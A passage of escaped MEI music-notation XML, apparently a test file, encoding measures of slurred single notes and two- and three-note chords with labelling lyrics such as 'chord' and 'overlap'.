xml:id=\"note-L14F1\" dur=\"4\" oct=\"4\" pname=\"c\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <slur xml:id=\"slur-L13F1-L14F1N1\" staff=\"1\" startid=\"#note-L13F1\" endid=\"#note-L14F1\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L15\" right=\"dbl\" n=\"5\">\r\n                            <staff xml:id=\"staff-L15F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L15F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L16F1\" dur=\"4\" oct=\"4\" pname=\"c\" accid.ges=\"n\">\r\n                                        <verse xml:id=\"verse-L16F2\" color=\"#ccc\" n=\"1\">\r\n                                            <syl xml:id=\"syl-L16F2\">1</syl>\r\n                                        </verse>\r\n                                        <verse xml:id=\"verse-L16F3\" color=\"#aaa\" n=\"2\">\r\n                                            <syl xml:id=\"syl-L16F3\">note</syl>\r\n                                        </verse>\r\n                                    </note>\r\n                                    <note xml:id=\"note-L17F1\" dur=\"4\" oct=\"5\" pname=\"a\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <slur xml:id=\"slur-L16F1-L17F1N1\" staff=\"1\" startid=\"#note-L16F1\" endid=\"#note-L17F1\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L18\" n=\"6\">\r\n                            <staff xml:id=\"staff-L18F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L18F1N1\" n=\"1\">\r\n                                    <chord xml:id=\"chord-L22F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L22F1S1\" oct=\"4\" pname=\"c\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L22F2\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L22F2\">1</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L22F3\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L22F3\">chord</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L22F1S2\" oct=\"4\" pname=\"e\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L22F2\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L22F2\">1</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L22F3\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L22F3\">chord</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                    </chord>\r\n                                    <chord xml:id=\"chord-L23F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L23F1S1\" oct=\"4\" pname=\"d\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L23F1S2\" oct=\"4\" pname=\"f\" accid.ges=\"n\" />\r\n                                    </chord>\r\n                                </layer>\r\n                            </staff>\r\n                            <dir xml:id=\"dir-L22F1\" place=\"above\" staff=\"1\" tstamp=\"1.000000\">\r\n                                <rend xml:id=\"rend-0000000738092437\" fontstyle=\"normal\">Two-note chords with 1 and 2 slurs</rend>\r\n                            </dir>\r\n                            <slur xml:id=\"slur-L22F1-L23F1N1\" staff=\"1\" startid=\"#chord-L22F1\" endid=\"#chord-L23F1\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L24\" n=\"7\">\r\n                            <staff xml:id=\"staff-L24F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L24F1N1\" n=\"1\">\r\n                                    <chord xml:id=\"chord-L25F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L25F1S1\" oct=\"5\" pname=\"a\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L25F2\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L25F2\">1</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L25F3\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L25F3\">chord</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L25F1S2\" oct=\"5\" pname=\"f\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L25F2\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L25F2\">1</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L25F3\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L25F3\">chord</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                    </chord>\r\n                                    <chord xml:id=\"chord-L26F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L26F1S1\" oct=\"5\" pname=\"g\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L26F1S2\" oct=\"5\" pname=\"e\" accid.ges=\"n\" />\r\n                                    </chord>\r\n                                </layer>\r\n                            </staff>\r\n                            <slur xml:id=\"slur-L25F1-L26F1N1\" staff=\"1\" startid=\"#chord-L25F1\" endid=\"#chord-L26F1\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L27\" n=\"8\">\r\n                            <staff xml:id=\"staff-L27F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L27F1N1\" n=\"1\">\r\n                                    <chord xml:id=\"chord-L28F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L28F1S1\" oct=\"5\" pname=\"a\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L28F2\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L28F2\">1</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L28F3\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L28F3\">chord</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L28F1S2\" oct=\"5\" pname=\"f\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L28F2\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L28F2\">1</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L28F3\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L28F3\">chord</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                    </chord>\r\n                                    <chord xml:id=\"chord-L29F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L29F1S1\" oct=\"4\" pname=\"c\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L29F1S2\" oct=\"4\" pname=\"e\" accid.ges=\"n\" />\r\n                                    </chord>\r\n                                </layer>\r\n                            </staff>\r\n                            <slur xml:id=\"slur-L28F1-L29F1N1\" staff=\"1\" startid=\"#chord-L28F1\" endid=\"#chord-L29F1\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L30\" n=\"9\">\r\n                            <staff xml:id=\"staff-L30F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L30F1N1\" n=\"1\">\r\n                                    <chord xml:id=\"chord-L31F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L31F1S1\" oct=\"4\" pname=\"c\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L31F2\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L31F2\">1</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L31F3\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L31F3\">chord</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L31F1S2\" oct=\"4\" pname=\"e\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L31F2\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L31F2\">1</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L31F3\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L31F3\">chord</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                    </chord>\r\n                                    <chord xml:id=\"chord-L32F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L32F1S1\" oct=\"5\" pname=\"a\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L32F1S2\" oct=\"5\" pname=\"f\" accid.ges=\"n\" />\r\n                                    </chord>\r\n                                </layer>\r\n                            </staff>\r\n                            <slur xml:id=\"slur-L31F1-L32F1N1\" staff=\"1\" startid=\"#chord-L31F1\" endid=\"#chord-L32F1\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L35\" n=\"10\">\r\n                            <staff xml:id=\"staff-L35F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L35F1N1\" n=\"1\">\r\n                                    <chord xml:id=\"chord-L36F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L36F1S1\" oct=\"4\" pname=\"c\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L36F2\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L36F2\">2</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L36F3\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L36F3\">chord</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L36F1S2\" oct=\"4\" pname=\"e\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L36F2\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L36F2\">2</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L36F3\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L36F3\">chord</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                    </chord>\r\n                                    <chord xml:id=\"chord-L37F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L37F1S1\" oct=\"4\" pname=\"d\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L37F1S2\" oct=\"4\" pname=\"f\" accid.ges=\"n\" />\r\n                                    </chord>\r\n                                </layer>\r\n                            </staff>\r\n                            <slur xml:id=\"slur-L36F1N2-L37F1N1\" staff=\"1\" startid=\"#note-L36F1S1\" endid=\"#note-L37F1S1\" />\r\n                            <slur xml:id=\"slur-L36F1N1-L37F1N2\" staff=\"1\" startid=\"#note-L36F1S2\" endid=\"#note-L37F1S2\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L38\" n=\"11\">\r\n                            <staff xml:id=\"staff-L38F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L38F1N1\" n=\"1\">\r\n                                    <chord xml:id=\"chord-L39F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L39F1S1\" oct=\"5\" pname=\"a\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L39F2\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L39F2\">2</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L39F3\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L39F3\">chord</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L39F1S2\" oct=\"5\" pname=\"f\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L39F2\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L39F2\">2</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L39F3\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L39F3\">chord</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                    </chord>\r\n                                    <chord xml:id=\"chord-L40F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L40F1S1\" oct=\"5\" pname=\"g\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L40F1S2\" oct=\"5\" pname=\"e\" accid.ges=\"n\" />\r\n                                    </chord>\r\n                                </layer>\r\n                            </staff>\r\n                            <slur xml:id=\"slur-L39F1N2-L40F1N1\" staff=\"1\" startid=\"#note-L39F1S2\" endid=\"#note-L40F1S2\" />\r\n                            <slur xml:id=\"slur-L39F1N1-L40F1N2\" staff=\"1\" startid=\"#note-L39F1S1\" endid=\"#note-L40F1S1\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L41\" n=\"12\">\r\n                            <staff xml:id=\"staff-L41F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L41F1N1\" n=\"1\">\r\n                                    <chord xml:id=\"chord-L42F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L42F1S1\" oct=\"5\" pname=\"a\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L42F2\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L42F2\">2</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L42F3\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L42F3\">chord</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L42F4\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L42F4\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L42F1S2\" oct=\"5\" pname=\"f\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L42F2\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L42F2\">2</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L42F3\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L42F3\">chord</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L42F4\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L42F4\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                    </chord>\r\n                                    <chord xml:id=\"chord-L43F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L43F1S1\" oct=\"4\" pname=\"c\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L43F1S2\" oct=\"4\" pname=\"e\" accid.ges=\"n\" />\r\n                                    </chord>\r\n                                </layer>\r\n                            </staff>\r\n                            <slur xml:id=\"slur-L42F1N2-L43F1N1\" staff=\"1\" startid=\"#note-L42F1S2\" endid=\"#note-L43F1S1\" />\r\n                            <slur xml:id=\"slur-L42F1N1-L43F1N2\" staff=\"1\" startid=\"#note-L42F1S1\" endid=\"#note-L43F1S2\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L44\" right=\"dbl\" n=\"13\">\r\n                            <staff xml:id=\"staff-L44F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L44F1N1\" n=\"1\">\r\n                                    <chord xml:id=\"chord-L45F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L45F1S1\" oct=\"4\" pname=\"c\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L45F2\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L45F2\">2</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L45F3\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L45F3\">chord</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L45F4\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L45F4\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L45F1S2\" oct=\"4\" pname=\"e\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L45F2\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L45F2\">2</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L45F3\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L45F3\">chord</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L45F4\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L45F4\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                    </chord>\r\n                                    <chord xml:id=\"chord-L46F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L46F1S1\" oct=\"5\" pname=\"a\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L46F1S2\" oct=\"5\" pname=\"f\" accid.ges=\"n\" />\r\n                                    </chord>\r\n                                </layer>\r\n                            </staff>\r\n                            <slur xml:id=\"slur-L45F1N2-L46F1N1\" staff=\"1\" startid=\"#note-L45F1S1\" endid=\"#note-L46F1S2\" />\r\n                            <slur xml:id=\"slur-L45F1N1-L46F1N2\" staff=\"1\" startid=\"#note-L45F1S2\" endid=\"#note-L46F1S1\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L48\" n=\"14\">\r\n                            <staff xml:id=\"staff-L48F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L48F1N1\" n=\"1\">\r\n                                    <chord xml:id=\"chord-L50F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L50F1S1\" oct=\"4\" pname=\"c\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L50F2\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L50F2\">1</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L50F3\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L50F3\">chord</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L50F1S2\" oct=\"4\" pname=\"e\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L50F2\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L50F2\">1</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L50F3\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L50F3\">chord</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L50F1S3\" oct=\"4\" pname=\"g\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L50F2\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L50F2\">1</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L50F3\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L50F3\">chord</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                    </chord>\r\n                                    <chord xml:id=\"chord-L51F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L51F1S1\" oct=\"4\" pname=\"d\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L51F1S2\" oct=\"4\" pname=\"f\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L51F1S3\" oct=\"4\" pname=\"a\" accid.ges=\"n\" />\r\n                                    </chord>\r\n                                </layer>\r\n                            </staff>\r\n                            <dir xml:id=\"dir-L50F1\" place=\"above\" staff=\"1\" tstamp=\"1.000000\">\r\n                                <rend xml:id=\"rend-0000001467850916\" fontstyle=\"normal\">Three-note chords with 1, 2 and 3 slurs</rend>\r\n                            </dir>\r\n                            <slur xml:id=\"slur-L50F1-L51F1N1\" staff=\"1\" startid=\"#chord-L50F1\" endid=\"#chord-L51F1\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L52\" n=\"15\">\r\n                            <staff xml:id=\"staff-L52F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L52F1N1\" n=\"1\">\r\n                                    <chord xml:id=\"chord-L53F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L53F1S1\" oct=\"5\" pname=\"a\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L53F2\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L53F2\">1</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L53F3\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L53F3\">chord</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L53F1S2\" oct=\"5\" pname=\"f\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L53F2\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L53F2\">1</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L53F3\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L53F3\">chord</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L53F1S3\" oct=\"5\" pname=\"d\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L53F2\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L53F2\">1</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L53F3\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L53F3\">chord</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                    </chord>\r\n                                    <chord xml:id=\"chord-L54F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L54F1S1\" oct=\"5\" pname=\"g\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L54F1S2\" oct=\"5\" pname=\"e\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L54F1S3\" oct=\"5\" pname=\"c\" accid.ges=\"n\" />\r\n                                    </chord>\r\n                                </layer>\r\n                            </staff>\r\n                            <slur xml:id=\"slur-L53F1-L54F1N1\" staff=\"1\" startid=\"#chord-L53F1\" endid=\"#chord-L54F1\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L55\" n=\"16\">\r\n                            <staff xml:id=\"staff-L55F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L55F1N1\" n=\"1\">\r\n                                    <chord xml:id=\"chord-L56F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L56F1S1\" oct=\"5\" pname=\"a\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L56F2\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L56F2\">1</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L56F3\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L56F3\">chord</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L56F1S2\" oct=\"5\" pname=\"f\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L56F2\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L56F2\">1</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L56F3\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L56F3\">chord</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L56F1S3\" oct=\"5\" pname=\"d\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L56F2\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L56F2\">1</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L56F3\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L56F3\">chord</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                    </chord>\r\n                                    <chord xml:id=\"chord-L57F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L57F1S1\" oct=\"4\" pname=\"c\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L57F1S2\" oct=\"4\" pname=\"e\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L57F1S3\" oct=\"4\" pname=\"g\" accid.ges=\"n\" />\r\n                                    </chord>\r\n                                </layer>\r\n                            </staff>\r\n                            <slur xml:id=\"slur-L56F1-L57F1N1\" staff=\"1\" startid=\"#chord-L56F1\" endid=\"#chord-L57F1\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L58\" n=\"17\">\r\n                            <staff xml:id=\"staff-L58F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L58F1N1\" n=\"1\">\r\n                                    <chord xml:id=\"chord-L59F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L59F1S1\" oct=\"4\" pname=\"c\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L59F2\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L59F2\">1</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L59F3\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L59F3\">chord</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L59F1S2\" oct=\"4\" pname=\"e\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L59F2\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L59F2\">1</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L59F3\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L59F3\">chord</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L59F1S3\" oct=\"4\" pname=\"g\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L59F2\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L59F2\">1</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L59F3\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L59F3\">chord</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                    </chord>\r\n                                    <chord xml:id=\"chord-L60F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L60F1S1\" oct=\"5\" pname=\"a\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L60F1S2\" oct=\"5\" pname=\"f\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L60F1S3\" oct=\"5\" pname=\"d\" accid.ges=\"n\" />\r\n                                    </chord>\r\n                                </layer>\r\n                            </staff>\r\n                            <slur xml:id=\"slur-L59F1-L60F1N1\" staff=\"1\" startid=\"#chord-L59F1\" endid=\"#chord-L60F1\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L62\" n=\"18\">\r\n                            <staff xml:id=\"staff-L62F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L62F1N1\" n=\"1\">\r\n                                    <chord xml:id=\"chord-L63F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L63F1S1\" oct=\"4\" pname=\"c\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L63F2\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L63F2\">2</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L63F3\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L63F3\">note</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L63F1S2\" oct=\"4\" pname=\"e\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L63F2\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L63F2\">2</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L63F3\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L63F3\">note</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L63F1S3\" oct=\"4\" pname=\"g\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L63F2\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L63F2\">2</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L63F3\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L63F3\">note</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                    </chord>\r\n                                    <chord xml:id=\"chord-L64F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L64F1S1\" oct=\"4\" pname=\"d\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L64F1S2\" oct=\"4\" pname=\"f\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L64F1S3\" oct=\"4\" pname=\"a\" accid.ges=\"n\" />\r\n                                    </chord>\r\n                                </layer>\r\n                            </staff>\r\n                            <slur xml:id=\"slur-L63F1N2-L64F1N1\" staff=\"1\" startid=\"#note-L63F1S1\" endid=\"#note-L64F1S1\" />\r\n                            <slur xml:id=\"slur-L63F1N1-L64F1N2\" staff=\"1\" startid=\"#note-L63F1S2\" endid=\"#note-L64F1S2\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L65\" n=\"19\">\r\n                            <staff xml:id=\"staff-L65F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L65F1N1\" n=\"1\">\r\n                                    <chord xml:id=\"chord-L66F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L66F1S1\" oct=\"5\" pname=\"a\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L66F2\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L66F2\">2</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L66F3\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L66F3\">note</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L66F1S2\" oct=\"5\" pname=\"f\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L66F2\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L66F2\">2</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L66F3\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L66F3\">note</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L66F1S3\" oct=\"5\" pname=\"d\" accid.ges=\"n\">\r\n                                            <verse 